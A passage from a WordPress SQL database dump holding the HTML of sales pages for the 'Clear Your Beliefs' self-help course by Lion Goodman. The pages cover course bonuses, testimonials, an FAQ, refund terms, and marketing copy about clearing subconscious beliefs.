src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:01:32', '2014-06-19 06:01:32', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1039, 2, '2014-06-19 01:37:47', '2014-06-19 06:37:47', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with 